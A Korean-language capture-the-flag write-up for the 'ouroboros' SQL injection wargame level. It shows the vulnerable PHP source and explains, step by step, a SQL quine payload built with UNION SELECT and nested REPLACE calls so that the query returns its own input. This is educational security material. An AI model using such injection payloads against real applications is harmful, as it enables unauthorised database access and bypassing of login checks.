[LOS] ouroboros

$password=md5('Ourob0rus_c4taphractus');공개

소스코드 분석

---

<?php   include "./config.php";   login_chk();   dbconnect();   if(preg_match('/prob|_|\.|rollup|join|@/i', $_GET['pw'])) exit("No Hack ~_~");   $query = "select pw from prob_ouroboros where pw='{$_GET[pw]}'";   echo "<hr>query : <strong>{$query}</strong><hr><br>";   $result = @mysql_fetch_array(mysql_query($query));   if($result['pw']) echo "<h2>Pw : {$result[pw]}</h2>";   if(($result['pw']) && ($result['pw'] === $_GET['pw'])) solve("ouroboros");   highlight_file(__FILE__); ?>

문제 내용은 간단하다

pw 파라미터 값과 결과 값과 같은 값이 나오면 된다.

하지만 prob_oroboros 테이블에는 데이터가 없다.

최소 union을 통해 값을 만들어 내야 하는데.. 입력 값와 결과 값이 같은 쿼리가 존재할까?  

문제 풀이

---

Thanks to kmon

https://www.shysecurity.com/post/20140705-SQLi-Quine

Codegate CTF 문제 심지어 페이로드도 같다!

쿼리 분석

---

이제 분석해보도록 하자. 글을 잘 못써서 이해못할수도 있다.

정말 제대로 분석하고 싶은 사람은 위의 주소를 참고하자. "REPLACE 함수가 바꿀 문자열이 여러 개이면 해당되는 문자열을 모두 바꾼다" 정도만 이해하고 본인의 테스트 서버에서 해보든 메모장에 적어서 눈으로 따라가든 직접 해보는 것이 좋다.

비슷한 구문이 많은데 똑같은 구문끼리 묶어보게 되면 일단 이렇게 구성이 되어 있다 할 수 있다.

페이로드는 [1][2][3][2][4] 와 같은 형태를 띄고 있고 각각의 쿼리는

[1]     ' union select REPLACE(REPLACE(

[2]     '" union select REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") as "quine'

[3]     ,CHAR(34),CHAR(39)),CHAR(36),

[4]     ) as 'quine

이다. [2]의 경우 조금 다르긴하지만 [1]$[3]$[4]와 비슷한 형태를 띄고 있다.

이 구문에서 결과값으로 나올 부분은 [3] 앞의 [2]인데 REPLACE로 인해 [2]가 [1][2][3][2][4] 와 같아지는 Magic을 보여준다.

왜 그런 Magic이 발생하는 지 총 2개의 REPLACE가 있으니 천천히 REPLACE를 적용해보자.

REPLACE가 여러개 있어보이지만 함수가 아니고 문자열로 인식되기 때문에 신경써줄 필요 없다. [1]의 REPLACE만 함수의 역할을 한다.

REPLACE('" union select REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") as "quine',CHAR(34),CHAR(39))

[2]에서 CHAR(34)를 CHAR(39)로 바꾸어준다. CHAR(34)는 더블쿼터(") 이고 CHAR(39)는 싱글쿼터(')이다 결과적으로는

' union select REPLACE(REPLACE('$',CHAR(34),CHAR(39)),CHAR(36),'$') as 'quine'

이렇게 변경되고 이는 [1]$[3]$[4]의 형태를 띄게 된다. 

' union select REPLACE(REPLACE('$',CHAR(34),CHAR(39)),CHAR(36),'$') as 'quine'

조금 부족하다. [2] 부분이 빠져있다. 이는 두번 째 REPLACE에서 해결된다.

첫번째 결과를 [1]$[3]$[4]라고 하자.

REPLACE([1]$[3]$[4],CHAR(36),'" union select REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") as "quine')

CHAR(36)을 [2]로 바꾸는 것이다. CHAR(36)은 $와 같다. 2번째 REPLACE까지 거치고 나게되면

결과적으로 [1][2][3][2][4] 가 된다. 이는 우리가 요청한 쿼리와 같은 구조를 가진다.

' union select REPLACE(REPLACE('" union select REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") as "quine' ,CHAR(34),CHAR(39)),CHAR(36),'" union select REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") as "quine') as 'quine

REPLACE함수는 대상 값에 바꿀 값이 여러 개가 있으면 전부 원하는 값으로 변경시켜 준다.

결과적으로 실제 요청 파라미터에는 하나의 쿼리만 들어가있지만 REPLACE 함수를 통해 여러 번 호출하여 결과 값에 여러번 출력해주어 클리어 해주었다 할 수 있다.